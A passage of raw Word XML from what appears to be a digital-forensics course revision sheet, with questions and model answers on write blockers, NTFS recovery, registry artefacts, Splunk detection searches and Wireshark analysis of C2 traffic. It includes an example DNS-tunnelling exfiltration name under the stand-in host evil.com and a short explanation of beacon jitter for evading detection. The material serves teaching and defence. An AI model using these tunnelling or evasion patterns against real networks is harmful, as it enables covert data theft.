            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The operating system on the drive starts and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">writes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> to it: timestamps (last access/modified) of system and user files change, log and temporary files are created, registry/configuration files and swap data are updated, and new data may overwrite deleted data in unallocated space. The original is no longer pristine, and the defence can argue contamination. The incident must be documented honestly; image the drive with a write blocker and state this in the report.</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Q2. Why record MD5 AND SHA-1 — why is one algorithm not enough in court?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Each algorithm has known weaknesses (MD5 and SHA-1 can be made to collide). If two independent algorithms both match, the chance that altered data could pass both is practically zero. It also allows verification with tools that support only one algorithm and prevents the opposing side from attacking the evidence by pointing at the weakness of a single algorithm. Modern practice also adds </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">SHA-256</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">.</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2 — Autopsy: Deleted File Recovery and Activity Timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Theory to revise:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> NTFS and MFT, deleted-file recovery, Autopsy workflow, timelines (Sections 2.8, 3.1, 3.6, 3.8).</w:t>
      </w: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Q1. In NTFS a file is deleted and its MFT entry is marked inactive. When does the data become unrecoverable?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">When the clusters that held the data are </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">reallocated and overwritten</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> by new data (or securely wiped, or erased by SSD TRIM). Until then the content is normally recoverable, and as long as the MFT record is not reused, the name and timestamps can also be recovered.</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Q2. Document accessed 23:47, USB connected 23:49. What hypothesis? What else to look for?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Hypothesis:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> the user may have copied the sensitive document to the USB drive (possible data exfiltration), but this is only a hypothesis. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Further evidence:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> USBSTOR serial number and first/last connection time; MountedDevices and MountPoints2 (user and drive letter); LNK files and Jump Lists referring to files on the removable drive; Shellbags for the USB folders; RecentDocs/OpenSavePidlMRU; file timestamps and $MFT; event logs (device installation, logons); archive/compression tools in Prefetch; cloud upload or email activity; and the USB device’s own contents.</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3 — Windows Registry Forensic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Theory to revise:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hives and key artefacts (Section 3.2).</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898"/>
        <w:gridCol w:w="5848"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Artefact table to prepare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="584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Columns</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USB devices (minimum 2)</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Vendor/product, serial number, first connected, last connected, drive letter, user</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UserAssist (decoded from ROT13)</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Program, run count, last run time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Run / RunOnce entries</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Key path, value name, command, suspicious? (reason)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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RecentDocs</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File/extension, order, time (key last-written)</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Q1. USBSTOR shows a connection at 23:49. What else would confirm data was copied to it?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The registry alone cannot prove copying. Supporting artefacts: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MountPoints2/MountedDevices</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (drive letter and user), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">RecentDocs/OpenSavePidlMRU</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LNK/Jump Lists</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> showing files opened from the removable drive, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Shellbags</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> showing folders browsed on it, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">ShimCache/UserAssist/Prefetch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> for copy or archive tools, and the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">timestamps</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> of the files on the USB device (created times matching the connection period).</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Q2. Why is a RunOnce entry pointing to C:\Users\Public\svchost32.exe suspicious?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The genuine process is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">svchost.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Windows\System32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. The name </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">svchost32.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> imitates it (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">masquerading</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Users\Public</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is a folder writable by any user — not a normal location for system programs. RunOnce launches it automatically at the next logon, which is a typical </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">persistence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> method. The file should be hashed, examined and checked against Prefetch and event logs.</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4 — Windows Event Log Analysis with Splunk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Theory to revise:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> event IDs and logon types (Section 3.3), SPL basics (Section 4.4).</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rPr>
          <w:cantSplit w:val="false"/>
        </w:trP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Typical searches for this practical</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">index=* EventCode=4625 | timechart span=1m count</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">index=* EventCode=4625 | stats count by src_ip, Account_Name | sort - count</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">index=* EventCode=4624 Account_Name=Administrator | table _time, src_ip, Logon_Type</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">index=* (EventCode=4720 OR EventCode=4732) | table _time, Account_Name, Group_Name</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">index=* EventCode=7045 | table _time, Service_Name, Service_File_Name</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Q1. 847 failed logins in 3 minutes from 10.0.0.55 against Administrator. Write an alert rule.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Search: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">index=* EventCode=4625 Account_Name=Administrator | stats count by src_ip | where count &gt; 20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> — run on a schedule every 5 minutes over the last 5 minutes. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Trigger</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> when the number of results is greater than 0; action: notify the SOC (email/ticket) and optionally block the IP. The threshold is tuned to avoid false positives from users who mistype passwords.</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Q2. Event 4624 Logon Type 3 from a workstation IP using Administrator at 03:00. What does it indicate?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A successful </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">network logon</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (for example to a share or remote service) by the powerful Administrator account at an unusual hour from an ordinary workstation. Administrators rarely work at 03:00, and workstations normally do not remotely log on to other systems, so this may indicate </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">lateral movement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> with stolen credentials or a compromised workstation. Check what happened next: new services (7045), new accounts (4720), file access, outbound traffic.</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5 — Network Forensics with Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Theory to revise:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wireshark features, cleartext credentials, C2, DNS tunnelling (Sections 4.2, 4.5).</w:t>
      </w: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Q1. The C2 beacon interval is exactly 60 seconds. How could the attacker make detection harder with jitter?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Jitter</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> adds a random variation to the interval — for example 60 seconds ± 30% — so connections occur at 42 s, 71 s, 55 s and so on. Perfectly regular timing no longer stands out. Analysts then use statistics (average interval, low variance), the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">consistency of destination, packet size and User-Agent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, and long-term analysis in flow data.</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Q2. DNS tunnelling used sub-domains such as dGhpcyBpcyBhIHRlc3Q=.evil.com. What is the encoding and what does it contain?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">It is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Base64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (letters and digits, ending with “=” padding). Decoded, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">dGhpcyBpcyBhIHRlc3Q=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> gives </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">“this is a test”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. In a real tunnel, the sub-domain carries encoded stolen data or commands to the attacker-controlled DNS server.</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6 — Memory Forensics with Volatility 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
